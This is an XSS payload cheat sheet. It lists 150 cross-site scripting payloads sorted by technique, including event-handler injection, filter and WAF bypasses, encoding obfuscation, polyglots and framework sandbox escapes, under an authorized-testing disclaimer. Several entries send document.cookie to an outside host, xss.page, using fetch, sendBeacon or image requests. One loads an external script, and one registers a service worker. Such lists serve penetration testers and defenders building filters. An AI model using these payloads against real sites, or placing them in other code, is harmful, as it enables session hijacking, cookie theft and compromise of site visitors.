XSS Payload Cheat Sheet
Comprehensive collection of 150 XSS payloads organized by technique and context
For educational and authorized testing purposes only. Unauthorized access to computer systems is illegal. Use these payloads only on systems you own or have explicit permission to test.
Showing 150 payloads
basichigh
Classic XSS payload using script tag
html
<script>alert(1)</script>Technique: script-tag
Context: html
Browsers: all
basichigh
Display current domain
html
<script>alert(document.domain)</script>Technique: script-tag
Context: html
Browsers: all
basiccritical
External script injection
html
<script src="//xss.page/xss.js"></script>Technique: script-tag
Context: html
Browsers: all
event-handlerhigh
Image error event handler
html
<img src=x onerror=alert(1)>Technique: onerror
Context: html
Browsers: all
event-handlerhigh
Body onload event
html
<body onload=alert(1)>Technique: onload
Context: html
Browsers: all
event-handlerhigh
SVG onload event
html
<svg onload=alert(1)>Technique: onload
Context: html
Browsers: all
event-handlerhigh
Input focus with autofocus
html
<input onfocus=alert(1) autofocus>Technique: onfocus
Context: html
Browsers: all
event-handlermedium
Marquee onstart event
html
<marquee onstart=alert(1)>Technique: onstart
Context: html
Browsers: chrome, edge
event-handlerhigh
Details toggle event
html
<details open ontoggle=alert(1)>Technique: ontoggle
Context: html
Browsers: all
svghigh
Script inside SVG
html
<svg><script>alert(1)</script></svg>Technique: svg-script
Context: html
Browsers: all
svghigh
SVG animate onbegin
html
<svg><animate onbegin=alert(1) attributeName=x>Technique: svg-animate
Context: html
Browsers: firefox, chrome
svghigh
SVG link with JavaScript protocol
html
<svg><a xlink:href="javascript:alert(1)"><text x="0" y="20">XSS</text></a></svg>Technique: svg-link
Context: html
Browsers: all
html5high
Video tag error event
html
<video src=x onerror=alert(1)>Technique: video
Context: html
Browsers: all
html5high
Audio tag error event
html
<audio src=x onerror=alert(1)>Technique: audio
Context: html
Browsers: all
html5critical
Iframe with JavaScript protocol
html
<iframe src="javascript:alert(1)">Technique: iframe
Context: html
Browsers: all
html5critical
Object with JavaScript data
html
<object data="javascript:alert(1)">Technique: object
Context: html
Browsers: all
html5critical
Embed with JavaScript source
html
<embed src="javascript:alert(1)">Technique: embed
Context: html
Browsers: all
javascripthigh
Break out of JavaScript string
html
'; alert(1); //Technique: string-break
Context: javascript
Browsers: all
javascripthigh
Break out of double-quoted string
html
"; alert(1); //Technique: string-break
Context: javascript
Browsers: all
javascriptmedium
Arithmetic operator injection
html
-alert(1)-Technique: arithmetic
Context: javascript
Browsers: all
javascripthigh
Template literal injection
html
${alert(1)}Technique: template-literal
Context: javascript
Browsers: all
urlhigh
JavaScript protocol in href
html
javascript:alert(1)Technique: javascript-protocol
Context: url
Browsers: all
urlcritical
Data URL with HTML
html
data:text/html,<script>alert(1)</script>Technique: data-url
Context: url
Browsers: all
attributehigh
Break out of attribute to add event
html
" onclick="alert(1)Technique: attribute-break
Context: attribute
Browsers: all
attributehigh
Attribute with autofocus trick
html
" autofocus onfocus="alert(1)Technique: attribute-break
Context: attribute
Browsers: all
bypassmedium
Bypass tag stripping filters
html
<scr<script>ipt>alert(1)</scr<script>ipt>Technique: nested-tags
Context: html
Browsers: all
bypassmedium
Unclosed tag to bypass parsing
html
<img src=x onerror="alert(1)"Technique: unclosed-tag
Context: html
Browsers: all
bypasslow
Case variation bypass
html
<img src=x oneRRor=alert(1)>Technique: case-variation
Context: html
Browsers: all
bypassmedium
Template literal instead of parentheses
html
<img src=x onerror=alert`1`>Technique: template-literal
Context: html
Browsers: all
bypassmedium
Slash as attribute separator
html
<svg/onload=alert(1)>Technique: slash-separator
Context: html
Browsers: all
encodingmedium
HTML entity encoding
html
<img src=x onerror=alert(1)>Technique: html-entities
Context: html
Browsers: all
encodingmedium
Unicode escape sequences
html
<img src=x onerror="\u0061\u006c\u0065\u0072\u0074(1)">Technique: unicode
Context: html
Browsers: all
encodingmedium
Hex escape sequences
html
<img src=x onerror="\x61\x6c\x65\x72\x74(1)">Technique: hex
Context: html
Browsers: all
encodinghigh
Base64 encoded payload
html
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Technique: base64
Context: html
Browsers: all
polyglotcritical
XSS polyglot for multiple contexts
html
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//Technique: multi-context
Context: multi
Browsers: all
polyglotcritical
Another XSS polyglot
html
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>Technique: multi-context
Context: multi
Browsers: all
domhigh
DOM-based via URL hash
html
#<img src=x onerror=alert(1)>Technique: hash-injection
Context: dom
Browsers: all
domhigh
DOM-based via query parameter
html
?search=<script>alert(1)</script>Technique: query-injection
Context: dom
Browsers: all
waf-bypasshigh
Bypass using eval with src attribute
html
<img src=x:alert(1) onerror=eval(src)>Technique: eval-src
Context: html
Browsers: all
waf-bypassmedium
HTML entity in parentheses
html
<svg><script>alert(1)</script>Technique: entity-bypass
Context: html
Browsers: all
waf-bypassmedium
Obfuscation using fromCharCode
html
<img src=x onerror=alert(String.fromCharCode(88,83,83))>Technique: fromCharCode
Context: html
Browsers: all
advancedhigh
HTML import with data URL
html
<link rel="import" href="data:text/html,<script>alert(1)</script>">Technique: link-import
Context: html
Browsers: chrome-old
advancedhigh
Meta refresh with JavaScript
html
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">Technique: meta-refresh
Context: html
Browsers: all
advancedmedium
Form with JavaScript action
html
<form action="javascript:alert(1)"><input type="submit">Technique: form-action
Context: html
Browsers: all
advancedmedium
Button formaction attribute
html
<button formaction="javascript:alert(1)">X</button>Technique: formaction
Context: html
Browsers: all
advancedmedium
MathML XSS vector
html
<math><mi//xlink:href="data:x,<script>alert(1)</script>">Technique: mathml
Context: html
Browsers: firefox
legacymedium
IE-specific eval bypass
html
<img src=x:alert(1) onerror=eval(src) alt=``,``>Technique: ie-quirks
Context: html
Browsers: ie, edge-legacy
legacylow
CSS import with JavaScript (IE)
html
<style>@import'javascript:alert(1)';</style>Technique: css-import
Context: html
Browsers: ie
moderncritical
Cookie exfiltration using fetch
html
<img src onerror="fetch('//xss.page?'+document.cookie)">Technique: exfiltration
Context: html
Browsers: all
moderncritical
Data exfiltration using sendBeacon
html
<img src onerror="navigator.sendBeacon('//xss.page',document.cookie)">Technique: beacon
Context: html
Browsers: all
modernhigh
Dynamic import with data URL
html
<script>import('data:text/javascript,alert(1)')</script>Technique: dynamic-import
Context: html
Browsers: modern
modernhigh
Iframe srcdoc attribute
html
<iframe srcdoc="<script>parent.alert(1)</script>">Technique: srcdoc
Context: html
Browsers: all
event-handlerhigh
Select element with autofocus
html
<select onfocus=alert(1) autofocus>Technique: onfocus
Context: html
Browsers: all
event-handlerhigh
Textarea with autofocus
html
<textarea onfocus=alert(1) autofocus>Technique: onfocus
Context: html
Browsers: all
event-handlermedium
Keygen with autofocus (deprecated)
html
<keygen onfocus=alert(1) autofocus>Technique: onfocus
Context: html
Browsers: legacy
event-handlerhigh
Video loadstart event
html
<video onloadstart=alert(1)><source>Technique: onloadstart
Context: html
Browsers: all
event-handlerhigh
Audio loadstart event
html
<audio onloadstart=alert(1)><source>Technique: onloadstart
Context: html
Browsers: all
event-handlerhigh
Page show event
html
<body onpageshow=alert(1)>Technique: onpageshow
Context: html
Browsers: all
event-handlermedium
Page hide event
html
<body onpagehide=alert(1)>Technique: onpagehide
Context: html
Browsers: all
event-handlermedium
Before unload event
html
<body onbeforeunload=alert(1)>Technique: onbeforeunload
Context: html
Browsers: all
event-handlermedium
Hash change event
html
<body onhashchange=alert(1)>Technique: onhashchange
Context: html
Browsers: all
event-handlermedium
Popstate event
html
<body onpopstate=alert(1)>Technique: onpopstate
Context: html
Browsers: all
event-handlerhigh
Form submit event
html
<form onsubmit=alert(1)><input type=submit>Technique: onsubmit
Context: html
Browsers: all
event-handlermedium
Input event
html
<input oninput=alert(1)>Technique: oninput
Context: html
Browsers: all
event-handlermedium
Change event
html
<input onchange=alert(1)>Technique: onchange
Context: html
Browsers: all
svgmedium
SVG set with event
html
<svg><set attributeName=onmouseover to=alert(1)>Technique: svg-set
Context: html
Browsers: firefox
svgmedium
SVG discard element
html
<svg><discard onbegin=alert(1)>Technique: svg-discard
Context: html
Browsers: chrome, firefox
svghigh
SVG foreignObject with HTML
html
<svg><foreignObject><body onload=alert(1)></foreignObject>Technique: svg-foreignobject
Context: html
Browsers: all
svghigh
SVG use with data URL
html
<svg><use href="data:image/svg+xml,<svg id=x><script>alert(1)</script></svg>#x">Technique: svg-use
Context: html
Browsers: chrome, firefox
svghigh
SVG title with script
html
<svg><title><script>alert(1)</script></title>Technique: svg-title
Context: html
Browsers: all
stylelow
CSS background with JavaScript (IE)
html
<style>*{background:url("javascript:alert(1)")}</style>Technique: css-url
Context: html
Browsers: ie
stylelow
CSS import with JavaScript
html
<style>@import"javascript:alert(1)";</style>Technique: css-import
Context: html
Browsers: ie
stylelow
CSS expression (IE)
html
<style>body{x:expression(alert(1))}</style>Technique: css-expression
Context: html
Browsers: ie
stylelow
Inline style with JavaScript (IE)
html
<div style="background:url(javascript:alert(1))">Technique: inline-style
Context: html
Browsers: ie
stylemedium
Link stylesheet with JavaScript
html
<link rel=stylesheet href="javascript:alert(1)">Technique: link-stylesheet
Context: html
Browsers: ie
xmlmedium
MathML with data URL
html
<math><mi xlink:href="data:x,<script>alert(1)</script>">Technique: mathml
Context: html
Browsers: firefox
xmlhigh
XML with XSL stylesheet
html
<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="data:text/xml,<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"><xsl:template match=\"/\"><script>alert(1)</script></xsl:template></xsl:stylesheet>"?>Technique: xsl
Context: xml
Browsers: firefox, ie
xmlmedium
XML namespace injection
html
<xml><a xmlns:a="http://www.w3.org/1999/xhtml"><a:body onload="alert(1)"/>Technique: xmlns
Context: html
Browsers: ie
protocolmedium
VBScript protocol (IE)
html
<a href="vbscript:msgbox(1)">Click</a>Technique: vbscript
Context: html
Browsers: ie
protocollow
LiveScript protocol (legacy)
html
<a href="livescript:alert(1)">Click</a>Technique: livescript
Context: html
Browsers: netscape
protocollow
Mocha protocol (legacy)
html
<a href="mocha:alert(1)">Click</a>Technique: mocha
Context: html
Browsers: netscape
waf-bypassmedium
Unicode escaped function name
html
<img src=x onerror=\u0061\u006c\u0065\u0072\u0074(1)>Technique: unicode-escape
Context: html
Browsers: all
waf-bypasshigh
Base64 encoded eval
html
<img src=x onerror=eval(atob("YWxlcnQoMSk="))>Technique: base64-eval
Context: html
Browsers: all
waf-bypassmedium
String concatenation bypass
html
<img src=x onerror=window[`al`+`ert`](1)>Technique: string-concat
Context: html
Browsers: all
waf-bypassmedium
Array find method
html
<img src=x onerror=[1].find(alert)>Technique: array-find
Context: html
Browsers: all
waf-bypassmedium
Top window reference
html
<img src=x onerror=top[`al`+`ert`](1)>Technique: top-window
Context: html
Browsers: all
waf-bypassmedium
Self window reference
html
<img src=x onerror=self[`al`+`ert`](1)>Technique: self-window
Context: html
Browsers: all
waf-bypassmedium
Parent window reference
html
<img src=x onerror=parent[`al`+`ert`](1)>Technique: parent-window
Context: html
Browsers: all
waf-bypassmedium
Frames window reference
html
<img src=x onerror=frames[`al`+`ert`](1)>Technique: frames-window
Context: html
Browsers: all
waf-bypassmedium
GlobalThis reference
html
<img src=x onerror=globalThis[`al`+`ert`](1)>Technique: globalthis
Context: html
Browsers: modern
obfuscationmedium
Decimal HTML entities
html
<img src=x onerror=alert(1)>Technique: decimal-entities
Context: html
Browsers: all
obfuscationmedium
Hexadecimal HTML entities
html
<img src=x onerror=alert(1)>Technique: hex-entities
Context: html
Browsers: all
obfuscationmedium
Padded HTML entities
html
<img src=x onerror="alert(1)">Technique: padded-entities
Context: html
Browsers: all
obfuscationlow
Uppercase tag and attribute
html
<IMG SRC=x ONERROR=ALERT(1)>Technique: uppercase
Context: html
Browsers: all
obfuscationlow
Mixed case
html
<ImG sRc=x OnErRoR=aLeRt(1)>Technique: mixedcase
Context: html
Browsers: all
bypassmedium
Newline between attributes
html
<img
src=x
onerror=alert(1)>Technique: newline
Context: html
Browsers: all
bypassmedium
Tab between attributes
html
<img src=x onerror=alert(1)>Technique: tab
Context: html
Browsers: all
bypassmedium
Slash separator
html
<img/src=x/onerror=alert(1)>Technique: slash
Context: html
Browsers: all
bypassmedium
Partial Unicode escape
html
<img src=x onerror=ale\u0072t(1)>Technique: unicode-escape-partial
Context: html
Browsers: all
bypasslow
Backslash in function name
html
<img src=x onerror=al\ert(1)>Technique: backslash
Context: html
Browsers: all
javascripthigh
Inside double quotes
html
"-alert(1)-"Technique: string-context
Context: javascript
Browsers: all
javascripthigh
Inside single quotes
html
'-alert(1)-'Technique: string-context
Context: javascript
Browsers: all
javascripthigh
Inside template literal
html
`-alert(1)-`Technique: template-literal
Context: javascript
Browsers: all
javascripthigh
Break out of object
html
};alert(1);//Technique: object-break
Context: javascript
Browsers: all
javascripthigh
Break out of array
html
]);alert(1);//Technique: array-break
Context: javascript
Browsers: all
frameworkhigh
AngularJS sandbox escape (old)
html
{{constructor.constructor('alert(1)')()}}Technique: angular-sandbox
Context: html
Browsers: all
frameworkhigh
AngularJS scope escape
html
{{$on.constructor('alert(1)')()}}Technique: angular-scope
Context: html
Browsers: all
frameworkhigh
AngularJS CSP bypass
html
<div ng-app ng-csp><input autofocus ng-focus="$event.view.alert(1)">Technique: angular-csp
Context: html
Browsers: all
frameworkhigh
Vue.js template injection
html
{{_openBlock.constructor('alert(1)')()}}Technique: vue-template
Context: html
Browsers: all
frameworkmedium
EJS template injection test
html
<%= 7*7 %>Technique: ejs-template
Context: html
Browsers: all
mobilemedium
Marquee on mobile browsers
html
<marquee onstart=alert(1)>Technique: marquee
Context: html
Browsers: mobile-chrome, mobile-safari
mobilelow
Isindex with image type
html
<isindex type=image src=x onerror=alert(1)>Technique: isindex
Context: html
Browsers: legacy
advancedmedium
BGSound tag (IE)
html
<bgsound src=javascript:alert(1)>Technique: bgsound
Context: html
Browsers: ie
advancedlow
Blink tag (deprecated)
html
<blink>test</blink>Technique: blink
Context: html
Browsers: legacy
advancedmedium
Applet tag
html
<applet code="JavaScript:alert(1)">Technique: applet
Context: html
Browsers: legacy
advancedlow
Layer tag (Netscape)
html
<layer onmouseover=alert(1)>Click</layer>Technique: layer
Context: html
Browsers: netscape
advancedlow
ILayer tag (Netscape)
html
<ilayer onmouseover=alert(1)>Click</ilayer>Technique: ilayer
Context: html
Browsers: netscape
data-uricritical
Data URI with HTML
html
<iframe src="data:text/html,<script>alert(1)</script>">Technique: data-html
Context: html
Browsers: all
data-uricritical
Object with data URI
html
<object data="data:text/html,<script>alert(1)</script>">Technique: data-object
Context: html
Browsers: all
data-uricritical
Embed with data URI
html
<embed src="data:text/html,<script>alert(1)</script>">Technique: data-embed
Context: html
Browsers: all
data-uricritical
Script with data URI
html
<script src="data:text/javascript,alert(1)"></script>Technique: data-script
Context: html
Browsers: firefox
commentlow
Script inside HTML comment
html
<!--<script>alert(1)</script>-->Technique: comment-script
Context: html
Browsers: ie
commentmedium
IE conditional comment
html
<!--[if gte IE 4]><script>alert(1)</script><![endif]-->Technique: conditional-comment
Context: html
Browsers: ie
metahigh
Meta refresh with JavaScript
html
<meta http-equiv="refresh" content="0;javascript:alert(1)">Technique: meta-refresh-js
Context: html
Browsers: ie
polyglothigh
Break attribute and inject script
html
">'><script>alert(1)</script>Technique: attribute-break
Context: multi
Browsers: all
polyglothigh
Close script and inject new
html
</script><script>alert(1)</script>Technique: script-close
Context: multi
Browsers: all
polyglothigh
Close style and inject script
html
</style><script>alert(1)</script>Technique: style-close
Context: multi
Browsers: all
polyglothigh
Close title and inject script
html
</title><script>alert(1)</script>Technique: title-close
Context: multi
Browsers: all
polyglothigh
Close textarea and inject script
html
</textarea><script>alert(1)</script>Technique: textarea-close
Context: multi
Browsers: all
polyglothigh
Close noscript and inject script
html
</noscript><script>alert(1)</script>Technique: noscript-close
Context: multi
Browsers: all
bypassmedium
Comment with escape
html
<script>alert(1)//\Technique: comment-escape
Context: html
Browsers: all
bypasslow
Comment padding
html
<script>/**/alert(1)</script>Technique: comment-padding
Context: html
Browsers: all
domhigh
Hash-based DOM XSS
html
#<img src=x onerror=alert(1)>Technique: hash
Context: dom
Browsers: all
domhigh
Query parameter DOM XSS
html
?q=<script>alert(1)</script>Technique: query
Context: dom
Browsers: all
interactionmedium
Requires user click
html
<a href="javascript:alert(1)">Click me</a>Technique: href-click
Context: html
Browsers: all
interactionmedium
Formaction requires click
html
<form><button formaction=javascript:alert(1)>Click</button>Technique: formaction-click
Context: html
Browsers: all
content-typehigh
XHTML context
html
<script>alert(1)</script>Technique: xhtml
Context: xhtml
Browsers: all
moderncritical
Fetch API exfiltration
html
<script>fetch("//xss.page?"+document.cookie)</script>Technique: fetch-exfil
Context: html
Browsers: all
moderncritical
Image-based exfiltration
html
<script>new Image().src="//xss.page?"+document.cookie</script>Technique: image-exfil
Context: html
Browsers: all
moderncritical
Beacon API exfiltration
html
<script>navigator.sendBeacon("//xss.page",document.cookie)</script>Technique: beacon-exfil
Context: html
Browsers: all
moderncritical
XHR prototype hijacking
html
<script>XMLHttpRequest.prototype.open=function(){alert(1)}</script>Technique: xhr-hijack
Context: html
Browsers: all
moderncritical
Cookie getter override
html
<script>Object.defineProperty(document,"cookie",{get:function(){alert(1)}})</script>Technique: cookie-getter
Context: html
Browsers: all
moderncritical
Service worker registration
html
<script>navigator.serviceWorker.register("evil.js")</script>Technique: service-worker
Context: html
Browsers: modern
modernlow
Performance timing
html
<script>performance.mark("xss")</script>Technique: performance-api
Context: html
Browsers: all
attributehigh
Inject event attribute
html
" onfocus=alert(1) autofocus="Technique: attribute-injection
Context: attribute
Browsers: all
attributemedium
Mouse event injection
html
" onmouseover=alert(1) "Technique: mouseover-injection
Context: attribute
Browsers: all
attributemedium
Begin event injection
html
" onbegin=alert(1) "Technique: onbegin-injection
Context: attribute
Browsers: all
modernhigh
WebAssembly instantiation
html
<script>WebAssembly.instantiate(new Uint8Array([0,97,115,109,1,0,0,0]))</script>Technique: wasm
Context: html
Browsers: modern
cssmedium
CSS import for data exfil
html
<style>@import url(//xss.page/?data);</style>Technique: css-import-exfil
Context: html
Browsers: all
cssmedium
CSS background for data exfil
html
<style>*{background:url(//xss.page/?data)}</style>Technique: css-bg-exfil
Context: html
Browsers: all